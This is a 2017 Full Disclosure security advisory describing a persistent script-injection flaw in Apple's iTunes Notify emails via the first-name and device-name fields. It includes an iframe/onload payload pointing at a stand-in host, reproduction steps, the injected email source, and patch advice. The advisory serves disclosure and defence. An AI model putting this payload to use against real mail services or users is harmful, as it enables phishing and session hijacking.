[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Apple (iTunes Notify) - Filter Bypass & Persistent Web Vulnerability

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Apple (iTunes Notify) - Filter Bypass & Persistent Web Vulnerability
From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
Date: Mon, 16 Jan 2017 11:08:14 +0100
Document Title:
===============
Apple (iTunes Notify) - Bypass & Persistent Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2024

Followup ID: 654962036

Vulnerability Magazine: 
https://www.vulnerability-db.com/?q=articles/2016/12/22/apple-ios-102-notify-function-vulnerable-attacks-idevice-itunes-appstore


Release Date:
=============
2017-01-16


Vulnerability Laboratory ID (VL-ID):
====================================
2024


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
iOS is a mobile operating system created and developed by Apple Inc. 
exclusively for its hardware. It is the operating 
system that presently powers many of the company's mobile devices, including 
the iPhone, iPad, and iPod touch.

(Copy of the Homepage: https://en.wikipedia.org/wiki/IOS )

iTunes is a media player, media library, online radio broadcaster, and mobile 
device management application developed by Apple Inc. 
It is used to play, download, and organize digital downloads of music and video 
(as well as other types of media available on the iTunes Store) 
on personal computers running the macOS and Microsoft Windows operating 
systems. The iTunes Store is also available on the iPhone, iPad, and iPod Touch.
Through the iTunes Store, users can purchase and download music, music videos, 
television shows, audiobooks, podcasts, movies, and movie rentals in some 
countries, and ringtones, available on the iPhone and iPod Touch (fourth 
generation onward). Application software for the iPhone, iPad and iPod Touch 
can 
be downloaded from the App Store. iTunes 12.5 is the most recent major version 
of iTunes, available for Mac OS X v10.9.5 or later and Windows 7 or later; 
it was released on September 13, 2016. iTunes 12.2 added Apple Music to the 
application, along with the Beats 1 radio station, and iTunes 12.5 offers a 
refinement of the Apple Music interface.

(Copy of the Homepage: https://en.wikipedia.org/wiki/ITunes )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input 
validation vulnerability and mail encode issue in the official apple itunes 
online service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-12-15: Researcher Notification & Coordination (Benjamin Kunz Mejri - 
Evolution Security GmbH)
2016-12-16: Vendor Notification (Apple Product Security Team)
2016-12-16: Vendor Response/Feedback (Apple Product Security Team)
2017-**-**: Vendor Fix/Patch (Apple Cupertino Service Developer Team)
2017-**-**: Security Acknowledgements (Apple Product Security Team)
2017-01-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple
Product: iTunes & AppStore - Online Service (Web-Application) 2016 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability and mail encode issue has been 
discovered in the official apple itunes online service web-application.
The persistent vulnerability allows remote attackers to inject own malicious 
script codes to the application-side of the vulnerable module or function.

The vulnerability is located in the new iTunes and Appstore `Notify` function 
for iOS 10 devices. The function does take the user credentials of the icloud 
or 
devicename values to perform the notify. The performed outgoing email of the 
new-itunes services has not parse mechanism for the user credentials streamed 
through 
the email client. Thus allows remote attackers to inject own malicious payloads 
to execute them within the introduction word line were the name is visible in 
the 
email body of the notify message. The request method is a sync via the device 
and the attack vector is persistent. The injection point are the user 
credentials of 
the `firstname` parameter and the execution point occurs in the outgoing email 
by the "@new.itunes.com" email sender. The same type of vulnerability has been 
disclosed already by our team in the invoices of the appstore and itunes in 
2015. (Ref: https://www.vulnerability-lab.com/get_content.php?id=1512 )
The vulnerability can be exploited on restricted accessable ios devices to the 
main account holder inbox. 
The issue could be used as well to continue the calender spam activities.

The security risk of the persistent input validation and mail encoding web 
vulnerability is estimated as high with a cvss (common vulnerability scoring 
system) 
count of 3.8. Exploitation of the persistent input validation and mail encoding 
web vulnerability requires a low privilege apple (appstore/itunes) account and 
low or medium user interaction. Successful exploitation of the vulnerability 
results in session hijacking, persistent phishing attacks, persistent redirect 
to 
external sources and persistent manipulation of affected or connected service 
module context

Vulnerable Module(s):
[+] Notify (New Function)

Vulnerable Paramter(s):
[+] firstname & name

Affected Module(s):
[+] Outgoing Service Notify Email Body

Affected Sender(s):
[+] do_not_reply@xxxxxxxxxxxxxx


Proof of Concept (PoC):
=======================
The persistent input validation and mail encode vulnerability can be exploited 
by remote attackers with low privilege user account and with low user 
interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: Payload(s)
>"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>


Manual steps to reproduce the vulnerability ... (via icloud on old entries)
1. First you need to have an exisiting account with a script code payload in 
the firstname and lastname
2. Login with the account and move into the idevice
3. Then open the itunes app or appstore app
4. Search for super mario run and the new notification button
5. Activate the activation button
Note: Now wait until the app is available because then you will receive a 
notify email with the name credentials
6. The email arrives to the inbox with manipulated credentials in the firstname 
and lastname of the email body introduction word "Hello"

Manual steps to reproduce the vulnerability ... (without icloud on new entries)
1. Change device name to a script code payload (exp ipad2)
2. Then move to the appstore or itunes app 
3. Search for super mario run and click to process the notification
4. In the moment the release becomes available an email will arrive with the 
values used by the device or account
5. The email arrives to the inbox with manipulated credentials in the firstname 
and lastname of the email body introduction word "Hello"

Note: The issue is similar to the already discovered itunes invoice 
vulnerbility exploited in 2015. The new.itunes.com service does 
not have the secure validation because it has implemented lately. Due to the 
taken values of the user account during the activate of 
the notify button the issue can be exploited. We prepared the exploitation 
already in september and got the confirm with the super 
mario run release in the eu around 15th.


PoC: Vulnerable Source (Email - )
<!-- end table containing Apple logo -->
<!-- begin table containing body copy -->
<table style="margin:0 auto" class="appl_100" width="600" cellspacing="0" 
cellpadding="0" border="0">
<tbody><tr><td class="appl_stack" valign="top" align="left">
<!-- begin table containing individual app -->
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td class="appl_app_txt" style="padding-bottom:14px;" align="left">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida 
Sans,Lucida Sans 
Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
Hallo &gt;"<iframe src="evil.source" 
onload="alert(&quot;ITUNESHACKWITHMARIO&quot;)">,
</div></td></tr>
<tr><td align="left" class="appl_app_txt" style="padding-bottom:14px;">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida 
Sans,Lucida Sans 
Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
du wolltest benachrichtigt werden, wenn es soweit ist &ndash; &bdquo;Super 
Mario Run&ldquo; von Nintendo ist jetzt erh&auml;ltlich. Du kannst das Spiel im 
App Store 
auf deinem iPhone oder iPad laden.&nbsp;
<br/><br/><a 
href="http://new.itunes.com/r?v=2&la=de&lc=de&a=FOqorWUXVdIQSl%2BmwRhvEMkn5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=aI6r3a7q6p";
 
style="color:#0088cc" class="appl-link">Jetzt laden</a>
<BR><BR>
Beste Gr&uuml;&szlig;e<br/>
Das App Store-Team


Vulnerable Email (Header)
Return-Path: <donotrep_nt_bounces@xxxxxxxxxxxxxx>
------=_Part_10460774_1004383268.1481850993725
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hallo >"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>,
du wolltest benachrichtigt werden, wenn es soweit ist =E2=80=93 =E2=80=9ESu=
per Mario Run=E2=80=9C von Nintendo ist jetzt erh=C3=A4ltlich. Du kannst da=
s Spiel im App Store auf deinem iPhone oder iPad laden.=C2=A0

Jetzt laden
http://new.itunes.com/r?v=3D2&la=3Dde&lc=3Dde&a=3DFOqorWUXVdIQSl%2BmwRhvEMk=
n5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=3DaI6y6a2j9C

Beste Gr=C3=BC=C3=9Fe
Das App Store-Team


Reference(s):
https://itunes.apple.com/us/app/super-mario-run/id1145275343


Solution - Fix & Patch:
=======================
The vulnerability can be patched by the following solution steps ...
1. Disallow the usage of special chars for the name variable (firstname) to 
prevent the injection point.
2. Parse in the @new.itunes.com sender the outgoing name values to prevent the 
execution point.
3. Use only the icloud credentials were a secure protection on input has 
implemented during the time.


Security Risk:
==============
The security risk of the persistent validation web vulnerability and mail 
encode issue in the itunes notify function is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                                - www.evolution-sec.com
Section:    magazine.vulnerability-lab.com      - 
vulnerability-lab.com/contact.php                             - 
evolution-sec.com/contact
Social:     twitter.com/vuln_lab                - facebook.com/VulnerabilityLab 
                                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php                    - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php         - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get a ask permission.

                                    Copyright © 2017 | Vulnerability Laboratory 
- [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Prev by Date: [FD] Salesforce (Event Registration) - Persistent Vulnerability
Next by Date: [FD] Security BSides Ljubljana 0x7E1 CFP - March 10, 2017
Previous by thread: [FD] Salesforce (Event Registration) - Persistent Vulnerability
Next by thread: [FD] Security BSides Ljubljana 0x7E1 CFP - March 10, 2017
Index(es):
- Date
- Thread